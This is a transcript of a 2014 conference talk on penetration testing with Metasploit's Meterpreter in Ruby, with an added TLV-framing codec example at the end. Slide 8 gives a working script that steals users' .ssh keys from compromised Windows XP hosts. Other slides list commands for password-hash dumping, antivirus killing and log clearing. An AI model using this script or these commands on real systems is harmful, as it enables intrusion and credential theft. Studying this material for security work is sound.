
Offensive Ruby

Slides from the talk given by me at RubyConf India 2014 on using the Meterpreter from the Metasploit Framework for penetration testing and exploit development. This could be thought of as a follow-up to my previous talk at RubyConf India 2013 titled "Pelting Rubies".


Transcript

  1. Offensive Ruby: Exploiting MongoDB/Ubuntu
     Vulnerability (CVE-2013-1892): specially crafted calls to the nativeHelper function in SpiderMonkey in MongoDB could be used to exploit.
     Affects:
     • MongoDB < 2.0.9 and 2.2.x < 2.2.4
     • x86 Linux
     Exploit Ref: www.exploit-db.com/exploits/24935/
  2. Offensive Ruby: Meterpreter
     • Payload (not an exploit)
     • In-memory DLL injection
     • Dynamically extensible
     • Client supports many languages
  3. Offensive Ruby: Meterpreter
     Architecture diagram labels: Victim; Metasploit Framework; Exploit + Payload (Stage 1); Target Process; Remote code execution; Connect back to MSF; DLL Injection; Payload (Stage 2); Meterpreter Server DLL; Meterpreter Server; Meterpreter Client; TLS/1.0 with TLV; Encrypted communication between Meterpreter Client and Server; IRB Shell; PHP Shell
  4. Offensive Ruby: Meterpreter Commands
     • Core: irb, migrate, sessions, background
     • Stdapi: mkdir, ifconfig, route, shell, clearev, screenshot
     • Priv: getsystem, hashdump
  5. Offensive Ruby: Bundled Scripts
     Scripts provide more features and can be used with “run”
     • checkvm
     • killav
     • hostedit
     • winenum
  6. Offensive Ruby: Exploiting MySQL/Windows
     Vulnerability (CVE-2012-5613): FILE privilege misconfiguration in MySQL can be exploited on Windows with the use of an MOF file.
     Affects (tested on):
     • MySQL 5.0.45
     • Windows XP SP3
     Exploit Ref: www.exploit-db.com/exploits/23179/
  7. Offensive Ruby: Custom Scripts
     • client, client.sys.config, client.sys.process, client.net.config
     • Create your <script>.rb in /usr/share/metasploit-framework/scripts/meterpreter
     • “run <script>” from meterpreter
  8. Offensive Ruby: Fetching contents of .ssh

     # Resolve a user's profile directory from its ProfileList registry subkey,
     # expanding %SystemDrive% to its real value on the victim.
     def profile_path(profiles_reg_key, sid)
       sys_drive_var = "%SystemDrive%"
       system_drive = client.fs.file.expand_path(sys_drive_var).to_s
       # REG_SZ data comes back NUL-terminated; strip the NUL before substituting.
       # gsub rather than gsub!, because gsub! returns nil when nothing matched.
       registry_getvaldata(profiles_reg_key + "\\" + sid, "ProfileImagePath")
         .gsub(/\0/, '').sub(sys_drive_var, system_drive)
     end

     if client.sys.config.sysinfo['OS'].include? "Windows XP"
       print_status "Windows XP found, trying to get user list"
       profiles_reg_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList"
       # Every subkey under ProfileList is a SID carrying its own ProfileImagePath.
       registry_enumkeys(profiles_reg_key).flatten.each do |sid|
         path = profile_path(profiles_reg_key, sid)
         unless path.include? "systemprofile"
           ssh_keys_dir = path + "\\.ssh"
           if client.fs.file.exists? ssh_keys_dir
             print_status "Downloading ssh keys from #{ssh_keys_dir}"
             client.fs.dir.download("/tmp/", ssh_keys_dir)
           end
         end
       end
     else
       print_error "Victim is not running Windows XP, giving up!"
     end
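Slide 3 names the TLV framing that the Meterpreter client and server exchange over TLS, and slide 2 calls the payload "dynamically extensible"; the two are connected, since nested length/type/value records let new commands be added without touching the outer packet format. The following Ruby is an added example written for this page, not code from the deck or from Metasploit. It assumes a simplified layout (a 4-byte big-endian length that counts the 8-byte header itself, then a 4-byte big-endian type, then the value); the type numbers and the sample request are constructed for the illustration, and Metasploit's actual packet header carries further fields, so this shows the framing idea rather than the real wire format. The decoder checks every length field against the bytes it actually holds, which is the check any parser of attacker-controlled TLV data needs.

```ruby
# Added example: minimal TLV codec in the style of Meterpreter's packet framing.
# Assumed layout: [length:4 BE][type:4 BE][value]; length includes the header.
TLV_HEADER_LEN = 8

# Type numbers constructed for this example only.
TLV_TYPE_COMMAND  = 0x0001   # value is a string
TLV_TYPE_ARGUMENT = 0x0002   # value is a string
TLV_TYPE_REQUEST  = 0x4000   # group: value is a list of nested TLVs

GROUP_TYPES = [TLV_TYPE_REQUEST].freeze

# Encode one TLV. A group value is an Array of [type, value] pairs and is
# encoded recursively; new commands just add nested TLVs, the outer framing
# never changes.
def tlv_encode(type, value)
  body = if GROUP_TYPES.include?(type)
           value.map { |t, v| tlv_encode(t, v) }.join.b
         else
           value.to_s.b
         end
  [TLV_HEADER_LEN + body.bytesize, type].pack('NN') + body
end

# Decode a buffer into [type, value] pairs. Each length field is validated
# against the remaining buffer before use, so a corrupted or hostile length
# raises instead of reading past the data.
def tlv_decode(buf)
  buf = buf.b
  tlvs = []
  offset = 0
  while offset < buf.bytesize
    if buf.bytesize - offset < TLV_HEADER_LEN
      raise ArgumentError, "truncated TLV header at offset #{offset}"
    end
    len, type = buf.byteslice(offset, TLV_HEADER_LEN).unpack('NN')
    if len < TLV_HEADER_LEN || offset + len > buf.bytesize
      raise ArgumentError, "bad TLV length #{len} at offset #{offset}"
    end
    value = buf.byteslice(offset + TLV_HEADER_LEN, len - TLV_HEADER_LEN)
    value = tlv_decode(value) if GROUP_TYPES.include?(type)
    tlvs << [type, value]
    offset += len
  end
  tlvs
end

# Round-trip a constructed request: one command with two arguments.
def demo_roundtrip
  request = [[TLV_TYPE_COMMAND, 'stdapi_fs_ls'],
             [TLV_TYPE_ARGUMENT, 'C:\\Users'],
             [TLV_TYPE_ARGUMENT, '*.txt']]
  tlv_decode(tlv_encode(TLV_TYPE_REQUEST, request))
end

p demo_roundtrip if __FILE__ == $PROGRAM_NAME
```

Run it directly to see the decoded request; the two ArgumentError paths are what distinguish a parser that survives malformed input from one that reads out of bounds.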